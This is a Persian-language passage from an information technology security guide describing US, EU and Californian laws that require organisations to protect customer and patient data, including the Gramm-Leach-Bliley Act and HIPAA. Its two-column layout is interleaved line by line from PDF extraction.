‫)ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ(؛‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺑﺎﻳﺪ ﻧﺼﺐ ﻭ ﺍﺟﺮﺍ ﮔﺮﺩﻧﺪ‪.‬‬ ‫•‬
‫ﻣﺤﺪﻭﺩﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻜﺎﻧﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ؛‬ ‫•‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﺮﻳﺪﺍﺭﺍﻥ؛‬ ‫•‬ ‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﺩﺭ ﭘﻴﺶ ﮔﺮﻓﺘﻪ ﻛﻪ ﺑﺮ ﻓﺮﺁﻳﻨﺪﻫﺎ‬
‫ﺗﻐﻴﻴﺮ ﺭﻭﺍﻟﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ؛‬ ‫•‬ ‫ﺗﻜﻴﻪ ﺩﺍﺭﺩ ﻭ ﻧﻪ ﺑﺮ ﺷﻴﻮﻩﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻗـﺎﻧﻮﻥ‬
‫‪٩٥‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﻭﮔﺎﻧﻪ )ﺳﻴﺎﺳﺖ ﺟﺪﺍﺳﺎﺯﻱ ﻭﻇﺎﻳﻒ‬ ‫•‬ ‫ﻣﺪﺭﻥﺳﺎﺯﻱ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ )ﻣـﺼﻮﺏ ﺳـﺎﻝ ‪۱۹۹۹‬؛ ﻛـﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ‬
‫‪Gramm - Leach - Biley‬‬ ‫ﻃﺮﻓـﺪﺍﺭﺍﻥ ﺍﺻـﻠﻲ ﺁﻥ ﺩﺭ ﻛﻨﮕـﺮﻩ‪ ،‬ﻣـﺼﻮﺑﺔ‬
‫ﻭ ﺑﺮﺭﺳــﻲ ﺳــﻮﺍﺑﻖ( ﺑــﺮﺍﻱ ﻛﺎﺭﻣﻨــﺪﺍﻧﻲ ﻛــﻪ ﺑــﻪ ﺍﻃﻼﻋــﺎﺕ‬
‫ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ "ﻫﺮ ﻣﺆﺳﺴﻪ ﻣـﺎﻟﻲ ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﺧﺮﻳﺪﺭﺍﻥ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ؛‬
‫ﻣﺪﺍﻭﻣﻲ ﺑﺮﺍﻱ ﺍﺣﺘﺮﺍﻡ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺧﻮﺩ ﺩﺍﺭﺩ ﻭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﻧﻔﻮﺫ‪٩٦‬؛‬ ‫•‬
‫ﺑﺎﻳﺪ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻭ ﻏﻴﺮﻋﻤـﻮﻣﻲ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﻧﻔﻮﺫ‪٩٧‬؛ ﻭ‬ ‫•‬
‫ﺧﺮﻳﺪﺍﺭﺍﻥ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻛﻨﺪ‪ ".‬ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻗﺎﻧﻮﻥ‪ ،‬ﮔﺮﺩﺍﻧﻨﺪﮔﺎﻥ‬
‫ﭘﻴﺶﺑﻴﻨـﻲ ﺗـﺪﺍﺑﻴﺮﻱ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﺨﺮﻳـﺐ‪،‬‬ ‫•‬
‫ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻧﻴﺎﺯﻣﻨـﺪ ﺗـﺼﻮﻳﺐ ﻗـﻮﺍﻧﻴﻦ ﻣـﺪﻳﺮﻳﺘﻲ ﻭ ﻓﻨـﻲ ﻭ‬
‫ﺩﺳﺘﻜﺎﺭﻱ‪ ،‬ﻳﺎ ﺣﺬﻑ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ‪.‬‬
‫ﻫﻤﭽﻨــﻴﻦ ﺍﻧﺠــﺎﻡ ﺣﻔﺎﻇــﺖ ﻓﻴﺰﻳﻜــﻲ ﺑــﺮﺍﻱ ﺍﻣﻨﻴــﺖ ﺍﻃﻼﻋــﺎﺕ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺟـﺮﺍﻱ‬ ‫ﻣﻲ ﺑﺎﺷﻨﺪ‪ .‬ﻧﻜﺘﻪ ﻣﻬـﻢ ﺍﻳﻨﺠﺎﺳـﺖ ﻛـﻪ ﺍﻳـﻦ ﺿـﻮﺍﺑﻂ ﻣـﺸﺨﺺ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺁﻣﻮﺯﺵ ﺑﺒﻴﻨﻨﺪ‪ .‬ﺑﺮﺭﺳﻲ ﻣﻨﻈﻢ ﺍﻳـﻦ ﻛﻨﺘﺮﻟﻬـﺎ‪،‬‬ ‫ﻧﻜﺮﺩﻩﺍﻧﺪ ﻛﻪ ﭼﻪ ﺍﺟﺰﺍﻱ ﻓﻨﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻟﺬﺍ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﺣـﺴﺎﺳﻴﺖ‬ ‫ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻗﺎﻧﻮﻥ ﺗﺼﻤﻴﻢ ﺩﺭ ﻣﻮﺭﺩ ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺧـﺎﺹ ﺭﺍ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﺗﻬﺪﻳﺪﺍﺕ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ‪ ،‬ﻭ‬ ‫ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﻭﺍﮔﺬﺍﺭ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺗﻐﻴﻴﺮ ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﻛـﺎﺭﻱ ﺳـﺎﺯﻣﺎﻥ ﻣﺜـﻞ ﺍﺩﻏـﺎﻡ ﻳـﺎ ﺍﺗﺤـﺎﺩ ﺑـﺎ‬
‫ﺑﺮ ﻣﺒﻨـﺎﻱ ﺍﻳـﻦ ﻗـﺎﻧﻮﻥ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻣـﺼﻮﺏ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺩﻳﮕﺮ‪ ،‬ﻭ ﻳﺎ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺎﺭﺝ‬
‫ﻗﺎﻧﻮﻧﮕـﺬﺍﺭ ﺑــﺮﺍﻱ ﺻــﻨﺎﻳﻊ ﺧــﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺗﻮﺳــﻂ ﺑﺎﻧﻜﻬــﺎ ﺍﺟــﺮﺍ‬
‫ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻫﻴﺄﺕ ﻣﺪﻳﺮﺓ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﻗﺎﻧﻮﻥ‪ ،‬ﺍﻗﺪﺍﻣﺎﺕ ﻓﻨﻲ ﻣﻘﺘﻀﻲ ﺭﺍ ﺗﻌﻴﻴﻦ ﻧﻤﻲ ﻛﻨﺪ‪ ،‬ﺑﻠﻜﻪ‬
‫ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺘﺒﻲ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺭﺍ‬
‫ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺫﻳﻞ ﺑﺎﺷﺪ‪:‬‬
‫ﺗﺄﻳﻴﺪ ﻧﻤﺎﻳﻨﺪ ﻭ ﺑﺮ ﻃﺮﺍﺣﻲ‪ ،‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻃـﺮﺡ )ﺷـﺎﻣﻞ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﻭ ﺑﺮﺭﺳﻲ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻣـﺪﻳﺮﻳﺘﻲ( ﻧﻈـﺎﺭﺕ ﻛﻨﻨـﺪ‪.‬‬ ‫ﻲ ﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ‬ ‫ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟ ﹺ‬ ‫•‬
‫ﻗﻮﺍﻧﻴﻦ ﻣﺸﺎﺑﻪ ﻛﻤﻴﺴﻴﻮﻥ ﺗﺠﺎﺭﺕ ﻣﻠﻲ‪ ،‬ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺗﺤـﺖ‬ ‫ﺍﻓﺸﺎﺳﺎﺯﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ‪ ،‬ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‪ ،‬ﺗﻐﻴﻴـﺮ ﻭ ﻳـﺎ ﺍﻧﻬـﺪﺍﻡ‬
‫ﻗﻠﻤﺮﻭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺗﻬﻴﺔ ﻃﺮﺣﻲ ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺆﺳﺴﺎﺕ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻳﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺧﺮﻳـﺪﺍﺭﺍﻥ‬
‫ﺑﺎﻳﺪ‪:‬‬ ‫ﺍﺳﺖ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﺩ‪.‬‬

‫ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻛﺎﺭﻣﻨﺪ ﺭﺍ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻨﺪ؛‬ ‫•‬ ‫ﺍﺣﺘﻤﺎﻝ ﻭ ﭘﺘﺎﻧﺴﻴﻞ ﺑﻪ ﻓﻌﻠﻴﺖ ﻧﺮﺳﻴﺪﻥ ﺍﻳﻦ ﺗﻬﺪﻳﺪﻫﺎ ﺭﺍ ﺑـﺎ‬ ‫•‬
‫ﺗﻮﺟﻪ ﺑﻪ ﺣﺴﺎﺳﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﺪ‪.‬‬

‫‪96‬‬ ‫‪Intrusion Monitoring Systems‬‬


‫‪97‬‬ ‫‪Intrusion Response Programs‬‬ ‫‪95‬‬ ‫‪Financial Services Modernization‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٥٤‬‬

‫ﺍﺯ ﻫﺮ ﻛـﺎﺭﺑﺮﺩ ﻭ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﻃﺒـﻖ ﺿـﺎﺑﻄﻪ‬ ‫•‬ ‫ﺩﺭ ﻫﺮ ﺑﺨﺶ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﻋﻤﻠﻴـﺎﺗﻲ ﺷـﺮﻛﺖ ﻣﺨـﺎﻃﺮﺍﺗﻲ‬ ‫•‬
‫ﺍﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﻧﻴﺴﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴﺪ؛ ﻭ‬ ‫ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳـﺪﺍﺭﺍﻥ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨـﺪ ﻣـﺸﺨﺺ ﻭ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻨﺪ ﻭ ﺍﺛﺮﺑﺨﺸﻲ ﺳﻴﺴﺘﻢ ﻛﻨﻮﻧﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺁﻥ‬
‫ﺍﺯ ﻫﻤﺎﻫﻨﮕﻲ ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺑﺎ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴﺪ‪.‬‬ ‫•‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ؛‬
‫ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﻗﺎﺑﻞ ﺍﻧﻌﻄﺎﻑ ﺍﺳﺖ‪:‬‬
‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺣﻔﺎﻇﺘﻲ ﺭﺍ ﻃﺮﺍﺣﻲ ﻭ ﺍﺟﺮﺍ ﻛﻨﻨﺪ ﻭ ﺁﻧـﺮﺍ ﺑﻄـﻮﺭ‬ ‫•‬
‫ﻣﺆﺳﺴﺎﺕ ﻣﺸﻤﻮﻝ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ‬ ‫•‬ ‫ﻣﻨﻈﻢ ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻭ ﺍﺻﻼﺡ ﻗﺮﺍﺭ ﺩﻫﻨﺪ؛‬
‫ﻛﻨﻨــﺪ ﺗــﺎ ﺑﻄــﻮﺭ ﻣﻨﻄﻘــﻲ ﻭ ﻣﻨﺎﺳــﺐ ﺍﻳــﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ‬
‫ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪﮔﺎﻥ ﻣﻨﺎﺳﺐ ﺧﺪﻣﺎﺕ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻭ ﺑﺎ ﺁﻧﻬـﺎ ﺑـﺮﺍﻱ‬ ‫•‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ؛‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺒﻨﺪﻧﺪ؛ ﻭ‬
‫ﺩﺭ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣـﻮﺭﺩ‬ ‫•‬
‫ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﺭﺍ ﺩﺭ ﺷﺮﺍﻳﻂ ﻭﺍﻗﻌﻲ )ﻣﺜﻞ ﺗﻐﻴﻴﺮ ﺳـﺎﺧﺘﺎﺭ ﻳـﺎ ﻋﻤﻠﻴـﺎﺕ‬ ‫•‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﭼﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ‪:‬‬
‫ﺳﺎﺯﻣﺎﻥ( ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﺍﺻـﻼﺡ ﻛﻨﻨـﺪ ﻭ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻧﺘـﺎﻳﺞ‬
‫‪ o‬ﺍﻧﺪﺍﺯﻩ‪ ،‬ﭘﻴﭽﻴﺪﮔﻲ‪ ،‬ﻭ ﮔﺴﺘﺮﺓ ﺁﻥ؛‬
‫‪ o‬ﺯﻳﺮﺳﺎﺧﺖ ﻓﻨﻲ‪ ،‬ﺳـﺨﺖ ﺍﻓـﺰﺍﺭ‪ ،‬ﻭ ﻗﺎﺑﻠﻴـﺖ ﺍﻣﻨﻴﺘـﻲ‬ ‫ﺁﺯﻣﺎﻳﺶ‪ ،‬ﻓﺮﺁﻳﻨﺪ ﻧﻈﺎﺭﺕ ﺭﺍ ﻧﻴﺰ ﺍﺭﺯﻳﺎﺑﻲ ﻭ ﺍﺻﻼﺡ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ؛‬ ‫ﺭﻭﻳﻜﺮﺩ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﻗـﺎﻧﻮﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﺑﻴﻤـﺔ ﺧـﺪﻣﺎﺕ ﺩﺭﻣـﺎﻧﻲ‬
‫‪ o‬ﻫﺰﻳﻨﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ؛ ﻭ‬ ‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‪ ٩٨‬ﺑﻪ ﭼﺸﻢ ﻣـﻲ ﺧـﻮﺭﺩ ﻛـﻪ ﻣﺆﺳـﺴﺎﺕ ﺧـﺪﻣﺎﺕ‬
‫‪ o‬ﺍﺣﺘﻤﺎﻝ ﻭ ﺣﺴﺎﺳﻴﺖ ﻫﺮﻳﻚ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ‪.‬‬ ‫ﺑﻬﺪﺍﺷﺘﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﻛﻨﻨﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺑﻴﻤﺎﺭ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﻄﻮﺭ ﻋﻤﻮﻣﻲ‪ ،‬ﺿﻌﻔﻬﺎ‬
‫ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﻫﻤـﻮﺍﺭﻩ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺩﻭﺭ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ‬
‫ﻭ ﻋﻴﻮﺏ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﻋﻤﻠﻜـﺮﺩ ﺳﻴـﺴﺘﻢ ﻭ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ‬
‫ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﺪ‪ .‬ﻃﺒﻖ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﺰﻡ ﺑـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﺍﻣﻨﻴﺖ‪ ،‬ﻣﻨﺘﺸﺮ ﺳـﺎﺯﻧﺪ‪ .‬ﻗـﻮﺍﻧﻴﻦ ﺍﺗﺤﺎﺩﻳـﺔ ﺍﺭﻭﭘـﺎ ﺍﺭﺍﺋـﻪ ﻛﻨﻨـﺪﮔﺎﻥ‬
‫ﻣﻨﺎﺳﺐ ﻭ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻫﺒﺮﻱ‪ ،‬ﻓﻴﺰﻳﻜﻲ ﻭ ﻓﻨﻲ ﻫﺴﺘﻨﺪ‬
‫ﺧﺪﻣﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﺸﺘﺮﻛﺎﻥ ﺭﺍ ﺍﺯ ﺧﻄﺮﺍﺗـﻲ‬
‫ﺗﺎ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﭘﺰﺷـﻜﻲ ﺍﺷـﺨﺎﺹ ﺩﺭ‬
‫ﻛﻪ ﺑﻮﺍﺳﻄﺔ ﺗﺨﻠﻒ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺷﺒﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨـﺪ )ﻭ‬
‫ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺶ ﺑﻴﻨﻲﺷـﺪﻩ ﻭ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ‬
‫ﻫﻤﭽﻨﻴﻦ ﻫﺰﻳﻨﺔ ﺍﺣﺘﻤﺎﻟﻲ ﺁﻥ( ﺁﮔﺎﻩ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺩﺭ ﺟـﻮﻻﻱ‬
‫ﺣﻔﻆ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺑﺮﺍﻱ ﺫﺧﻴـﺮﻩ ﻭ ﺍﻧﺘﻘـﺎﻝ ﺩﺍﺩﻩﻫـﺎ ﺍﻋﻤـﺎﻝ‬
‫‪ ۲۰۰۳‬ﺩﺭ ﺍﻳﺎﻟﺖ ﻛﺎﻟﻴﻔﺮﻧﻴﺎ ﻗﺎﻧﻮﻧﻲ ﺗﺼﻮﻳﺐ ﺷﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻫـﺮ‬
‫ﻣﻲﺷﻮﺩ ﻭ ﺩﺍﺭﺍﻱ ‪ ۲۸‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ‪ ۴۱‬ﺷﺮﺡ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺍﺳـﺖ‪.‬‬
‫ﺷﺮﻛﺘﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺳﺎﻛﻨﺎﻥ ﻛﺎﻟﻴﻔﺮﻧﻴـﺎ ﺭﺍ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺁﻳﻨﺪﻫﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﺎﻳـﺪ‬
‫ﻣﻲﻛﻨﺪ‪ ،‬ﻣﻮﻇﻒ ﺑﻪ ﺁﮔﺎﻩ ﺳـﺎﺧﺘﻦ ﺁﻧـﺎﻥ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﺣﺘﻤـﺎﻟﻲ‬
‫ﺑﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻓﻨﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺛﺒﺖ‪ ،‬ﻫﺰﻳﻨـﺔ ﺍﻗـﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘـﻲ‪،‬‬
‫ﺣﺎﺻﻞ ﺍﺯ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ ﺑـﻪ ﺁﻥ‬
‫ﻧﻴﺎﺯ ﺁﻣﻮﺯﺷﻲ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﻭ ﺍﺭﺯﺵ ﺑﺮﺭﺳﻲ ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﺭﺩﮔﻴـﺮﻱ ﺩﺭ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺩﺭﻧﻈﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﻗـﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘـﻲ‪،‬‬
‫ﻋﻤﻠﻴﺎﺕ ﺣﻔﺎﻇﺘﻲ ﻛﻪ "ﻻﺯﻡ" ﻭ "ﻗﺎﺑﻞ ﺗﻮﺟﻪ" ﻫﺴﺘﻨﺪ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ‬
‫ﻣﻲ ﻛﻨﻨﺪ‪ .‬ﻧﻜﺎﺕ ﺍﺻﻠﻲ ﻗـﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘـﻲ ﻛـﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ‬
‫ﻣﺆﺳﺴﺎﺕ ﻭﺍﻗﻊ ﺷﻮﻧﺪ‪ ،‬ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺗﻲ‬ ‫•‬
‫ﻛﻪ ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﺍﻳﺠﺎﺩ‪ ،‬ﺩﺭﻳﺎﻓﺖ‪ ،‬ﻧﮕﻬـﺪﺍﺭﻱ ﻳـﺎ ﺍﻧﺘﻘـﺎﻝ‬
